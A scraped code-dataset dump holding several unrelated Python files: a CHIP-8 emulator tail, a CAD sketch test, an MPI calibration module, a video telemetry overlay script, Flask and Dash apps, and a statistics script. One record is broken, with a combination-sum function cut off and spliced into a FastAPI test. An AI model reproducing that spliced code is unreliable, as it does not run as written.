= b2\n\n addr |= b1\n addr <<= 4\n addr |= b2 # nnn\n addr <<= 4\n addr |= b3\n\n byte |= b2\n byte <<= 4 # kk\n byte |= b3\n\n if b0 == 0x0 and b1 == 0x0 and b2 == 0xE and b3 == 0x0:\n self.display_clear()\n elif b0 == 0x0 and b1 == 0x0 and b2 == 0xE and b3 == 0xE:\n self.RET()\n elif b0 == 0x1:\n self.JMP(addr)\n elif b0 == 0x2:\n self.CALL(addr)\n elif b0 == 0x3:\n self.SEB(x, byte)\n elif b0 == 0x4:\n self.SNEB(x, byte)\n elif b0 == 0x5 and b3 == 0x0:\n self.SER(x, y)\n elif b0 == 0x6:\n self.LDB(x, byte)\n elif b0 == 0x7:\n self.ADDB(x, byte)\n elif b0 == 0x8 and b3 == 0x0:\n self.LDRR(x, y)\n elif b0 == 0x8 and b3 == 0x1:\n self.ORR(x, y)\n elif b0 == 0x8 and b3 == 0x2:\n self.ANDR(x, y)\n elif b0 == 0x8 and b3 == 0x3:\n self.XORR(x, y)\n elif b0 == 0x8 and b3 == 0x4:\n self.ADDR(x, y)\n elif b0 == 0x8 and b3 == 0x5:\n self.SUBR(x, y)\n elif b0 == 0x8 and b3 == 0x6:\n self.SHR(x)\n elif b0 == 0x8 and b3 == 0x7:\n self.SUBNR(x, y)\n elif b0 == 0x8 and b3 == 0xE:\n self.SHLR(x)\n elif b0 == 0x9 and b3 == 0x0:\n self.SNER(x, y)\n elif b0 == 0xA:\n self.LDRI(addr)\n elif b0 == 0xB:\n self.JMPI(addr)\n elif b0 == 0xC:\n self.RNDB(x, byte)\n elif b0 == 0xD:\n self.DRW(x, y, b3)\n elif b0 == 0xE and b2 == 0x9 and b3 == 0xE:\n self.SKP(x)\n elif b0 == 0xE and b2 == 0xA and b3 == 0x1:\n self.SKNP(x)\n elif b0 == 0xF and b2 == 0x0 and b3 == 0x7:\n self.LDRT(x)\n elif b0 == 0xF and b2 == 0x0 and b3 == 0xA:\n self.LDWFK(x)\n elif b0 == 0xF and b2 == 0x1 and b3 == 0x5:\n self.LDTR(x)\n elif b0 == 0xF and b2 == 0x1 and b3 == 0x8:\n self.LDSR(x)\n elif b0 == 0xF and b2 == 0x1 and b3 == 0xE:\n self.ADDIR(x)\n elif b0 == 0xF and b2 == 0x2 and b3 == 0x9:\n self.LDSPRI(x)\n elif b0 == 0xF and b2 == 0x3 and b3 == 0x3:\n self.BCD(x)\n elif b0 == 0xF and b2 == 0x5 and b3 == 0x5:\n self.LDMR(x)\n elif b0 == 0xF and b2 == 0x6 and b3 == 0x5:\n self.LDRM(x)\n else:\n print(\"UNKNOWN\")\n print(\"{} {} {} {} \".format(hex(b0), hex(b1), hex(b2), hex(b3)))\n input(\"\")\n\n def tick(self):\n self.updated_display = 0\n if self.TIMER > 0:\n self.TIMER -= 1\n if self.SOUND > 0:\n self.SOUND -= 1\n self.read_pc()\n self.ACTIVE_KEYS = []\n\n\nif TERMINAL_GAME:\n emu = Chip8()\n emu.load_rom(\"pong.ch8\")\n while True:\n emu.tick()\n","repo_name":"AngelouDi/8chipico","sub_path":"chippico8.py","file_name":"chippico8.py","file_ext":"py","file_size_in_byte":13736,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"40"} +{"seq_id":"40222766546","text":"from GeomDataAPI import *\nfrom ModelAPI import *\nfrom SketchAPI import SketchAPI_Sketch\nimport math\nfrom salome.shaper import model\n\n__updated__ = \"2017-04-06\"\n\nTOLERANCE = 1.e-7\n\n#=========================================================================\n# Auxiliary functions\n#=========================================================================\n\ndef verifyLastArc(theSketch, theCenter, theStart, theEnd):\n \"\"\"\n subroutine to verify position of last arc in the sketch\n \"\"\"\n aLastArc = model.lastSubFeature(theSketch, \"SketchArc\")\n model.assertArc(aLastArc, theCenter, theStart, theEnd)\n\ndef verifyTangent(theFeature1, theFeature2):\n anArcs = []\n aLines = []\n aFeatures = [theFeature1, theFeature2]\n for feat in aFeatures:\n if feat.getKind() == \"SketchLine\":\n aLines.append(feat)\n elif feat.getKind() == \"SketchArc\":\n anArcs.append(feat)\n if len(anArcs) == 2:\n verifyArcArcTangent(anArcs[0], anArcs[1])\n elif len(anArcs) == 1 and len(aLines) == 1:\n verifyArcLineTangent(anArcs[0], 
aLines[0])\n\ndef verifyArcArcTangent(theArc1, theArc2):\n aCenter1 = geomDataAPI_Point2D(theArc1.attribute(\"center_point\"))\n aStart1 = geomDataAPI_Point2D(theArc1.attribute(\"start_point\"))\n aRadius1 = model.distancePointPoint(aStart1, aCenter1)\n\n aCenter2 = geomDataAPI_Point2D(theArc2.attribute(\"center_point\"))\n aStart2 = geomDataAPI_Point2D(theArc2.attribute(\"start_point\"))\n aRadius2 = model.distancePointPoint(aStart2, aCenter2)\n\n aDistCC = model.distancePointPoint(aCenter1, aCenter2)\n aRSum = aRadius1 + aRadius2\n aRDiff = math.fabs(aRadius1 - aRadius2)\n assert math.fabs(aRSum - aDistCC) < TOLERANCE or math.fabs(aRDiff - aDistCC) < TOLERANCE, \"Arcs do not tangent\"\n\ndef verifyArcLineTangent(theArc, theLine):\n aCenter = geomDataAPI_Point2D(theArc.attribute(\"center_point\"))\n aStart = geomDataAPI_Point2D(theArc.attribute(\"start_point\"))\n aRadius = model.distancePointPoint(aStart, aCenter)\n\n aDistCL = model.distancePointLine(aCenter, theLine)\n assert math.fabs(aDistCL - aRadius) < TOLERANCE, \"Arc and line do not tangent\"\n\ndef verifyPointOnLine(thePoint, theLine):\n aDistance = model.distancePointLine(thePoint, theLine)\n assert aDistance < TOLERANCE, \"Point is not on Line, distance: {0}\".format(aDistance)\n\n\n\naSession = ModelAPI_Session.get()\naDocument = aSession.moduleDocument()\n#=========================================================================\n# Creation of a sketch\n#=========================================================================\naSession.startOperation()\naSketchCommonFeature = aDocument.addFeature(\"Sketch\")\naSketchFeature = featureToCompositeFeature(aSketchCommonFeature)\norigin = geomDataAPI_Point(aSketchFeature.attribute(\"Origin\"))\norigin.setValue(0, 0, 0)\ndirx = geomDataAPI_Dir(aSketchFeature.attribute(\"DirX\"))\ndirx.setValue(1, 0, 0)\nnorm = geomDataAPI_Dir(aSketchFeature.attribute(\"Norm\"))\nnorm.setValue(0, 0, 1)\naSession.finishOperation()\naSketch = SketchAPI_Sketch(aSketchFeature)\n\n# auxiliary line\naLineStartPnt = [0., 0.]\naLineEndPnt = [50., 0.]\naSession.startOperation()\naSketchLine = aSketchFeature.addFeature(\"SketchLine\")\naLineStart = geomDataAPI_Point2D(aSketchLine.attribute(\"StartPoint\"))\naLineEnd = geomDataAPI_Point2D(aSketchLine.attribute(\"EndPoint\"))\naLineStart.setValue(aLineStartPnt[0], aLineStartPnt[1])\naLineEnd.setValue(aLineEndPnt[0], aLineEndPnt[1])\naSession.finishOperation()\n\n#=========================================================================\n# Test 1. 
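# The tangency predicate in verifyArcArcTangent above: two circles are
# tangent iff the distance between their centers equals either the sum of
# the radii (external tangency) or the absolute difference (internal).
# A standalone numeric check of that rule; the helper name is hypothetical:
import math

def circles_tangent(c1, r1, c2, r2, tol=1e-7):
    d = math.hypot(c2[0] - c1[0], c2[1] - c1[1])
    return abs(d - (r1 + r2)) < tol or abs(d - abs(r1 - r2)) < tol

assert circles_tangent((0, 0), 2, (5, 0), 3)       # externally tangent
assert circles_tangent((0, 0), 5, (2, 0), 3)       # internally tangent
assert not circles_tangent((0, 0), 1, (5, 0), 1)   # disjoint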
Create an arc, tangent to the line\n#=========================================================================\nanArcEndPnt = [80., 20.]\naSession.startOperation()\nanArc = aSketchFeature.addFeature(\"SketchMacroArc\")\nassert (anArc.getKind() == \"SketchMacroArc\")\nanArcTgPnt = anArc.refattr(\"tangent_point\")\nassert (not anArcTgPnt.isInitialized())\nanArcEnd = geomDataAPI_Point2D(anArc.attribute(\"end_point_3\"))\nassert (not anArcEnd.isInitialized())\nanArcType = anArc.string(\"arc_type\")\nassert (not anArcType.isInitialized())\n# initialize attributes\nanArcType.setValue(\"by_tangent_edge\")\nanArcTgPnt.setAttr(aLineEnd)\nanArcEnd.setValue(anArcEndPnt[0], anArcEndPnt[1])\naSession.finishOperation()\nverifyLastArc(aSketchFeature, [], aLineEndPnt, anArcEndPnt)\naLastArc = model.lastSubFeature(aSketchFeature, \"SketchArc\")\nverifyTangent(aLastArc, aSketchLine)\nmodel.testNbSubFeatures(aSketch, \"SketchConstraintCoincidence\", 1)\nmodel.testNbSubFeatures(aSketch, \"SketchConstraintTangent\", 1)\n\n#=========================================================================\n# Test 2. Create an arc, tangent to the previous arc\n#=========================================================================\naPrevArc = aLastArc\naPrevArcEnd = geomDataAPI_Point2D(aPrevArc.attribute(\"end_point\"))\nanArcEndPnt = [50., 100.]\naSession.startOperation()\nanArc = aSketchFeature.addFeature(\"SketchMacroArc\")\nanArcTgPnt = anArc.refattr(\"tangent_point\")\nanArcEnd = geomDataAPI_Point2D(anArc.attribute(\"end_point_3\"))\nanArcType = anArc.string(\"arc_type\")\n# initialize attributes\nanArcType.setValue(\"by_tangent_edge\")\nanArcTgPnt.setAttr(aPrevArcEnd)\nanArcEnd.setValue(anArcEndPnt[0], anArcEndPnt[1])\naSession.finishOperation()\nverifyLastArc(aSketchFeature, [], [aPrevArcEnd.x(), aPrevArcEnd.y()], anArcEndPnt)\naLastArc = model.lastSubFeature(aSketchFeature, \"SketchArc\")\nverifyTangent(aLastArc, aPrevArc)\nmodel.testNbSubFeatures(aSketch, \"SketchConstraintCoincidence\", 2)\nmodel.testNbSubFeatures(aSketch, \"SketchConstraintTangent\", 2)\n\n#=========================================================================\n# Test 3. 
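# verifyArcLineTangent and verifyPointOnLine above both reduce to a
# point-to-line distance; for the line through P and Q it is the magnitude
# of a 2-D cross product divided by the segment length. A standalone sketch
# (the helper name is hypothetical):
import math

def point_line_distance(pt, p, q):
    cross = (q[0] - p[0]) * (p[1] - pt[1]) - (p[0] - pt[0]) * (q[1] - p[1])
    return abs(cross) / math.hypot(q[0] - p[0], q[1] - p[1])

assert abs(point_line_distance((0, 3), (0, 0), (10, 0)) - 3.0) < 1e-9
assert point_line_distance((5, 0), (0, 0), (10, 0)) < 1e-9   # on the line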
Create an arc, tangent to the previous arc with end point on the line
#=========================================================================
aPrevArc = aLastArc
aPrevArcEnd = geomDataAPI_Point2D(aPrevArc.attribute("end_point"))
aSession.startOperation()
anArc = aSketchFeature.addFeature("SketchMacroArc")
anArcTgPnt = anArc.refattr("tangent_point")
anArcEnd = geomDataAPI_Point2D(anArc.attribute("end_point_3"))
anArcEndRef = anArc.refattr("end_point_ref")
anArcType = anArc.string("arc_type")
# initialize attributes
anArcType.setValue("by_tangent_edge")
anArcTgPnt.setAttr(aPrevArcEnd)
anArcEndRef.setObject(aSketchLine.lastResult())
anArcEnd.setValue(aLineStartPnt[0], aLineStartPnt[1])
aSession.finishOperation()
verifyLastArc(aSketchFeature, [], [aPrevArcEnd.x(), aPrevArcEnd.y()], [])
aLastArc = model.lastSubFeature(aSketchFeature, "SketchArc")
verifyTangent(aLastArc, aPrevArc)
aLastArcEnd = geomDataAPI_Point2D(aLastArc.attribute("end_point"))
verifyPointOnLine(aLastArcEnd, aSketchLine)
model.testNbSubFeatures(aSketch, "SketchConstraintCoincidence", 4)
model.testNbSubFeatures(aSketch, "SketchConstraintTangent", 3)

#=========================================================================
# End of test
#=========================================================================

assert(model.checkPythonDump())
","repo_name":"x3-apptech/salome-modules-shaper","sub_path":"src/SketchPlugin/Test/TestCreateArcByTangentEdge.py","file_name":"TestCreateArcByTangentEdge.py","file_ext":"py","file_size_in_byte":6962,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"40"}
{"seq_id":"39458397670","text":"
#
#
# @param num int 1-D integer list
# @param target int
# @return 2-D integer list
#
class Solution:
    def combinationSum2(self, num, target):
        # write code here
        def dfs(path, target, start):
            if target < 0:
                return
            if target == 0:
                res.append(path[:])
                return
            for i in range(start, n):
                # skip duplicates at the same depth; prune once the sorted
                # candidates exceed the remaining target
                if (i > start and num[i] == num[i - 1]) or target < num[i]:
                    continue
                path.append(num[i])
                dfs(path, target - num[i], i + 1)
                path.pop()

        # The remainder of this record was lost to markup stripping in the
        # source; the completion below follows the standard pattern for this
        # template and is an assumption.
        num.sort()
        n = len(num)
        res = []
        dfs([], target, 0)
        return res

# [record truncated in source: the fragment below belongs to a different
#  file, test_main.py, whose beginning was lost]
50K'
    """
    # raw data as read from file
    raw_data = offline_inference_artifacts['offline_dataframe']
    parsed_data = raw_data.to_dict(orient='records')
    offline_predictions = offline_inference_artifacts['offline_predictions']
    for raw_json_input, expected_prediction in zip(parsed_data,
                                                   offline_predictions):
        if expected_prediction == '>50K':
            r = client.post('/inference', json=raw_json_input)
            assert r.status_code == 200
            assert r.json() == Output(salary=expected_prediction).dict()
","repo_name":"marcospiau/ml-devops-nanodegree-project-course-4","sub_path":"test_main.py","file_name":"test_main.py","file_ext":"py","file_size_in_byte":4807,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"}
{"seq_id":"35453068518","text":"
from __future__ import unicode_literals

from mpi4py import MPI

from .adaptive_calibration import calibration_scale_factor_adaptive
from .dip import dip_scale_factor
from .bandwidth import h_crit_scale_factor


def compute_calibration(calibration_file, test, null, alpha, adaptive=True,
                        lower_lambda=0, upper_lambda=2.0, comm=MPI.COMM_WORLD):
    '''
    Compute calibration constant lambda_alpha and save to file
    'calibration_file'.

    Input:
        test           - 'dip' or 'bw'.
        null           - 'shoulder' or 'normal'. Reference distribution.
        alpha          - significance level.
        adaptive       - should adaptive probabilistic bisection
                         search be used?
        lower_lambda   - lower bound for lambda_alpha in
                         bisection search.
        upper_lambda   - upper bound for lambda_alpha in
                         bisection search.
        comm           - MPI communicator.
    '''

    if comm.Get_rank() == 0:
        try:
            with open(calibration_file, 'a') as f:
                pass  # check that it is possible to write to the file
        except Exception as e:
            exc = e
        else:
            exc = None
    else:
        exc = None
    exc = comm.bcast(exc)
    if exc is not None:
        raise exc

    if adaptive:
        return calibration_scale_factor_adaptive(alpha, test, null, lower_lambda, upper_lambda,
                                                 comm, calibration_file)

    if test == 'dip':
        return dip_scale_factor(alpha, null, lower_lambda, upper_lambda,
                                comm, calibration_file)

    if test == 'bw':
        return h_crit_scale_factor(alpha, null, lower_lambda, upper_lambda,
                                   comm, calibration_file)
","repo_name":"kjohnsson/modality","sub_path":"modality/calibration/compute_calibration.py","file_name":"compute_calibration.py","file_ext":"py","file_size_in_byte":1945,"program_lang":"python","lang":"en","doc_type":"code","stars":17,"dataset":"github-code","pt":"40"}
{"seq_id":"36388349150","text":"
# -*- coding: utf-8 -*-

'''
    HUD OVERLAY DRAWER
The script draws a telemetry HUD overlay on FPV video. Telemetry data should
be provided as a Strava-derived *.gpx track and an offset file produced by
the moment_track.py script.

See the Settings section to adjust parameters.

Note that the script is intended to be run from an IDE (such as Spyder). It
can of course be called from the command line, but it does not accept any
command-line parameters, so you really SHOULD look at the Settings section.


DISCLAIMER:
The script really does what it declares, although it is far from optimized;
it is ridiculously slow, to be honest. It mostly serves me as a testing
ground for related technologies.
Still it does the thing if you're not\r\nexpecting fast video processing from a python script.\r\n\r\nPrerequisites: pillow, py-opencv, numpy, pandas\r\n'''\r\n\r\nimport strava_gpx as strava\r\nimport pandas as pd\r\nimport numpy as np\r\nimport cv2\r\nimport PIL\r\nimport os\r\nimport json\r\nfrom widgets import Speedometer, Map, HeartRate\r\n\r\n##########################################################################\r\ndef decodeFourcc(cc):\r\n return ''.join([chr((int(cc) >> 8 * i) & 0xff) for i in range(4)]).upper()\r\n##########################################################################\r\ndef pure_pil_alpha_to_color(image, color=(255, 255, 255)):\r\n '''Alpha composite an RGBA Image with a specified color.\r\n Source: http://stackoverflow.com/a/9459208/284318\r\n Keyword Arguments:\r\n image -- PIL RGBA Image object\r\n color -- Tuple r, g, b (default 255, 255, 255)\r\n '''\r\n image.load() # needed for split()\r\n background = PIL.Image.new('RGB', image.size, color)\r\n background.paste(image, mask=image.split()[3]) # 3 is the alpha channel\r\n return background\r\n##########################################################################\r\ndef readOffsets(finename):\r\n try:\r\n with open(finename, 'r') as f:\r\n fileData = json.load(f)\r\n dt = pd.to_timedelta(fileData['diffTime'])\r\n dtMs = int(fileData['diffMS'])\r\n except:\r\n dt = pd.to_timedelta('0 days 00:00:00')\r\n dtMs = 0\r\n \r\n return dt, dtMs\r\n##########################################################################\r\ndef timeSec(hours, minutes, seconds):\r\n return int(seconds + 60*minutes + 3600*hours)\r\n##########################################################################\r\nif __name__ == '__main__':\r\n # ------- Settings -------\r\n # Input video file name. No strict requirements as long as OpenCV can read it\r\n videoFileName = 'e:/ph/Sochi-2019/video/2019_0923_123806_025.MOV'\r\n\r\n # Input video start time. Usually comes from file naming of attributes\r\n videoStartTime = np.datetime64('2019-09-23 12:38:06')\r\n\r\n # Input video start and stop moments (in seconds from start) \r\n timingStart = timeSec(hours=0, minutes=13, seconds=11)\r\n timingEnd = timeSec(hours=0, minutes=14, seconds=35)\r\n \r\n # Input track file name. Should be track saved from Strava via \"Export GPX\"\r\n # function (assuming it works the same way as at November 2019)\r\n trackFileName = 'downhill.gpx'\r\n \r\n # Input timing offsets file. The one saved with moment_track.py\r\n offsetFileName = 'offset.json'\r\n\r\n # Output video vile parameters. Compatibility depends on local OpenCV version\r\n outFile = 'out.mp4'\r\n encoding = 'h264'\r\n \r\n # Forced output size. 
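# Round-trip check for decodeFourcc above: OpenCV packs a four-character
# codec code little-endian into an int, and the helper unpacks it byte by
# byte. A standalone sketch, assuming cv2 is available:
import cv2

def decode(cc):
    return ''.join(chr((int(cc) >> 8 * i) & 0xFF) for i in range(4)).upper()

assert decode(cv2.VideoWriter_fourcc(*'mp4v')) == 'MP4V'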
# Forced output size. Not used if at least one is negative or None\r\n forcedWidth = None\r\n forcedHeight = None\r\n\r\n # Widgets\r\n # Check different IMPLs for a variety of presets\r\n widgets = [\r\n Speedometer.IMPL01(pos=(100, 600), scale=1.0),\r\n Map.IMPL02(pos=(1100, 50), size=(800, 800)),\r\n HeartRate.IMPL01(pos=(1600, 900), scale=1.0)\r\n ]\r\n # ------- End of settings -------\r\n \r\n # Clear output file if it exists\r\n if os.path.exists(outFile):\r\n os.remove(outFile) # Will raise an exception if it's a directory\r\n\r\n # Read offsets\r\n diffTime, diffTimeMS = readOffsets(offsetFileName)\r\n\r\n # Read GPX\r\n df = strava.readGPX(trackFileName, interpolateToSeconds=False)\r\n \r\n # Prepare widgets\r\n for w in widgets:\r\n w.prepare(df)\r\n \r\n # Open video\r\n cap = cv2.VideoCapture(videoFileName)\r\n width = int(cap.get(cv2.CAP_PROP_FRAME_WIDTH))\r\n height = int(cap.get(cv2.CAP_PROP_FRAME_HEIGHT))\r\n expectedFrames = int(cap.get(cv2.CAP_PROP_FRAME_COUNT))\r\n outFPS = cap.get(cv2.CAP_PROP_FPS)\r\n \r\n print('File: ', videoFileName)\r\n print(\r\n decodeFourcc(cap.get(cv2.CAP_PROP_FOURCC)), '@', '%.0f FPS'%cap.get(cv2.CAP_PROP_FPS),\r\n ':', width, 'x', height\r\n )\r\n print('Frames: ', expectedFrames)\r\n \r\n # Check resizing and form the output writer \r\n isResizing = (forcedWidth is not None and forcedWidth > 0) and (forcedHeight is not None and forcedHeight > 0)\r\n if isResizing:\r\n width = int(forcedWidth)&~1 # &~1 clears the lowest bit so the width stays even\r\n height = int(forcedHeight)&~1 # (many codecs require even frame dimensions)\r\n \r\n fourcc = cv2.VideoWriter_fourcc(*encoding)\r\n out = cv2.VideoWriter(outFile, fourcc, outFPS, (width, height))\r\n \r\n timingPrev = 0\r\n\r\n videoTime = pd.to_datetime(videoStartTime) - diffTime\r\n \r\n # Percentage scaling\r\n timingScale = 100.0/(timingEnd - timingStart)\r\n \r\n while(cap.isOpened()):\r\n ret, frame = cap.read()\r\n if not ret:\r\n break\r\n \r\n timingCurMS = cap.get(cv2.CAP_PROP_POS_MSEC) - diffTimeMS\r\n timingCur = int(timingCurMS/1000)\r\n \r\n if timingPrev != timingCur:\r\n percentStr = 'skipping to start...'\r\n if timingCur >= timingStart:\r\n percentage = int((timingCur - timingStart)*timingScale)\r\n percentStr = '%d%% complete'%(percentage)\r\n else:\r\n percentage = int((timingCur/timingStart)*100) if timingStart > 0 else 100\r\n percentStr = 'skipping to start... %d%%'%(percentage)\r\n print('Cur timing: %d of %d to %d (%s)'% (timingCur, timingStart , timingEnd, percentStr))\r\n timingPrev = timingCur\r\n \r\n 
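# Editor's note: frames before timingStart are decoded and simply discarded below.\r\n # If the container supports it, a single up-front seek would skip faster, e.g.\r\n # cap.set(cv2.CAP_PROP_POS_MSEC, timingStart*1000) -- a suggestion, not part of the original.\r\n 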
if timingCur < timingStart:\r\n continue\r\n elif timingCur >= timingEnd:\r\n break\r\n \r\n curRec = strava.getRecordForTimeAndOffset(df, videoTime, timingCurMS)\r\n \r\n # OpenCV (BGR) to PIL (RGBA)\r\n frame = cv2.cvtColor(frame,cv2.COLOR_BGR2RGB)\r\n pil_im = PIL.Image.fromarray(frame).convert('RGBA')\r\n \r\n # Draw widgets\r\n for w in widgets:\r\n w.draw(pil_im, curRec)\r\n \r\n # PIL back to OpenCV (BGR)\r\n if isResizing:\r\n frame = cv2.resize(np.array(pure_pil_alpha_to_color(pil_im))[:, :, ::-1], (width, height), interpolation=cv2.INTER_AREA)\r\n else:\r\n frame = np.array(pure_pil_alpha_to_color(pil_im))[:, :, ::-1]\r\n #frame = np.array(pure_pil_alpha_to_color(pil_im))[:, :, ::-1].copy()\r\n\r\n # Write frame \r\n out.write(frame)\r\n\r\n if cv2.waitKey(1) & 0xFF == ord('q'):\r\n break\r\n \r\n \r\n cap.release()\r\n out.release()\r\n cv2.destroyAllWindows()\r\n \r\n print('Done.')\r\n","repo_name":"youzhick/StravaOverlay","sub_path":"overlay_drawer.py","file_name":"overlay_drawer.py","file_ext":"py","file_size_in_byte":7222,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"40"}
{"seq_id":"20098005141","text":"from project import search\r\nimport sqlite3\r\nfrom flask import Flask, request, render_template\r\napp = Flask(__name__)\r\n\r\ncon = sqlite3.connect('тексты (3).bd')\r\ncur = con.cursor()\r\n\r\n\r\n@app.route('/')\r\ndef my_form():\r\n return render_template('main.html')\r\n\r\n\r\n@app.route('/search', methods=['post'])\r\ndef my_form_post():\r\n variable = request.form['variable']\r\n search_exp = str(variable)\r\n result = search(search_exp)\r\n return render_template('search.html', result=result)\r\n\r\n\r\nif __name__ == '__main__':\r\n app.run(debug=True)","repo_name":"AlexandraSedlovskaya/project","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":549,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"}
{"seq_id":"1407852777","text":"from stat_alunos import *\r\nimport random\r\nimport copy\r\nimport operator\r\nimport math\r\n\r\n# H0 - there is no difference between the runs. alpha = 0.05; if the p-value < alpha -> reject the null and accept H1\r\n\r\n# run experiments for the distributions: define alpha -> if the p-value is below it, the null hypothesis can be rejected (they are different)\ndef analysis():\n\n print(\"Choose the function\")\n print('[1] Rastrigin')\n print('[2] Schwefel')\n print('[3] Griewangk')\n key = int(input())\n\n if key==1:\n function = \"Rastrigin\"\n elif key == 2:\n function = \"Schwefel\"\n elif key == 3:\n function = \"Griewangk\"\n\n print(\"Choose what to analyse\")\n print(\"[1] Fitness\")\n print(\"[2] Generation with the best fitness\")\n tipo = int(input())\n\n\n significance_alpha = 0.05\n one_cross = [[float(x.split(' ')[tipo-1].rstrip()) for x in open(function + \"_one.txt\").readlines()]]\n ari_cross = [[float(x.split(' ')[tipo-1].rstrip()) for x in open(function + \"_arit.txt\").readlines()]]\n all_rastrigin_data = [one_cross[0], ari_cross[0]]\n \n\n #DATA DESCRIPTION\n \"\"\" print('\\n')\n describe_data(one_cross[0])\n print('\\n')\n describe_data(ari_cross[0])\n print('\\n') \"\"\"\n #################\n data = [one_cross[0], ari_cross[0]]\n plt.subplot(221)\n histogram_norm(data[0], \"Histogram\", \"value\", \"quantity\")\n\n plt.subplot(222)\n histogram_norm(data[1], \"Histogram\", \"value\", \"quantity\")\n\n plt.subplot(223)\n plt.boxplot(data[0], labels=[function + \" One Point\"])\n\n plt.subplot(224)\n plt.boxplot(data[1], labels=[function + \" Arithmetical\"])\n\n plt.show()\n \n test_statistic_one, p_value_one_point = test_normal_sw(one_cross)\n test_statistic_ari, p_value_ari = test_normal_sw(ari_cross)\n test_statistic_levene, p_value_levene = levene(all_rastrigin_data)\n print(\"shapiro p_value one: \", p_value_one_point)\n print(\"shapiro p_value ari: \", p_value_ari)\n print(\"levene p_value: \", p_value_levene)\n if(p_value_one_point >= significance_alpha and p_value_ari >= significance_alpha and p_value_levene >= significance_alpha):\n #Parametric\n print(\"Parametric\")\n #final_ts, final_pv = one_way_ind_anova(file_data)\n #t_test_ind(one_cross, ari_cross)\n final_ts, final_pv = t_test_dep(one_cross[0], ari_cross[0])\n else:\n #Non-parametric\n print(\"Non-parametric\")\n #final_ts, final_pv = kruskal_wallis(file_data)\n #final_ts, final_pv = mann_whitney(one_cross[0], ari_cross[0])\n #final_ts, final_pv = t_test_ind(one_cross, ari_cross)\n final_ts, final_pv = wilcoxon(one_cross[0], ari_cross[0])\n \n print(final_ts, final_pv)\n \n if(final_pv < significance_alpha):\n print('Null hypothesis (H0) rejected. Accept H1 -> Different')\n elif (final_pv >= significance_alpha):\n print('H0 accepted. 
Theres probably no difference!')\n\n\nif __name__ == '__main__':\n analysis()","repo_name":"flaviojfpereira/ea-crossover-operators-comparison","sub_path":"proj_stat_analysis.py","file_name":"proj_stat_analysis.py","file_ext":"py","file_size_in_byte":2946,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"37035514822","text":"import logging\nfrom logging import FileHandler\n\nfrom os import path, makedirs\n\n_log_formatter = logging.Formatter(fmt='%(asctime)s %(levelname)-.4s (%(filename)s).%(funcName)s(%(lineno)s) %('\n 'message)s',\n datefmt='%d.%m.%Y %H:%M:%S')\n\n\ndef get_file_handler():\n if not path.exists('logs'):\n makedirs('logs')\n\n file_handler = FileHandler('logs/Log.log')\n file_handler.setLevel(logging.INFO)\n file_handler.setFormatter(_log_formatter)\n return file_handler\n\n\ndef get_stream_handler():\n stream_handler = logging.StreamHandler()\n stream_handler.setLevel(logging.INFO)\n stream_handler.setFormatter(_log_formatter)\n return stream_handler\n\n\ndef get_logger(name):\n logger = logging.getLogger(name)\n logger.setLevel(logging.INFO)\n logger.addHandler(get_file_handler())\n logger.addHandler(get_stream_handler())\n return logger\n","repo_name":"Navatusein/Ip-Deputy-2.0","sub_path":"Bot/tgbot/logger.py","file_name":"logger.py","file_ext":"py","file_size_in_byte":937,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"39142454627","text":"from services.mongo_access import MongoDBCollections\nfrom venders.mopsfin import Mopsfin\n\n\nclass IncomeProcessor:\n def __init__(self):\n self.mongo = MongoDBCollections()\n self.data = Mopsfin().get_income()\n\n def process(self):\n for index, item in self.data.iterrows():\n item_dict = item.to_dict()\n symbol = item_dict.pop(\"symbol\")\n date_key = item_dict.pop(\"date_key\")\n print(f\"processing {symbol} {date_key}\")\n self.mongo.insert_income(symbol=symbol, date_key=date_key, data=item_dict)\n","repo_name":"davidleeasset/stock_bot_007","sub_path":"services/income_processer.py","file_name":"income_processer.py","file_ext":"py","file_size_in_byte":569,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"28458977061","text":"import dash\r\nimport dash_core_components as dcc\r\nimport dash_html_components as html\r\nfrom dash.dependencies import Input, Output, State\r\n\r\nfrom plotly.offline import plot, iplot\r\nimport plotly.graph_objs as go\r\nimport numpy as np\r\nimport pandas as pd\r\nimport quandl\r\nimport plotly.figure_factory as ff\r\nimport matplotlib as mpl\r\nimport plotly.plotly as py\r\n\r\nfrom pplots import *\r\nfrom pcode import *\r\n\r\napp=dash.Dash()\r\n\r\napp.css.append_css({\"external_url\": 'https://codepen.io/chriddyp/pen/bWLwgP.css'})\r\napp.title=\"ApPlotly\"\r\n\r\napp.layout=html.Div([\r\n\r\n\r\n\thtml.Div([html.H1(children=\"ApPlotly\", style={\"color\":\"maroon\", \"text-align\":\"center\", \"font-family\":\"cursive\",\r\n\t\t\"font-weight\":\"bold\", \"font-size\":\"60px\",})],\r\n\t\tclassName=\"twelve columns\"),\r\n\r\n\r\n\thtml.Div([\r\n\t\t\thtml.Div([dcc.Dropdown(\r\n\t\t\t\tid = 'dropdown',\r\n\t\t\t\toptions=[\r\n\t {'label': 'Simple scatter plot', 'value': 1},\r\n\t {'label': 'Styled scatter plot', 'value': 2},\r\n\t {'label': 'Multiple scatter plot', 'value': 3},\r\n\t {'label': 'Simple line chart', 'value': 4},\r\n\t {'label': 'Line with Scatter', 'value': 5},\r\n\t {'label': 'Dashed/dotted lines', 
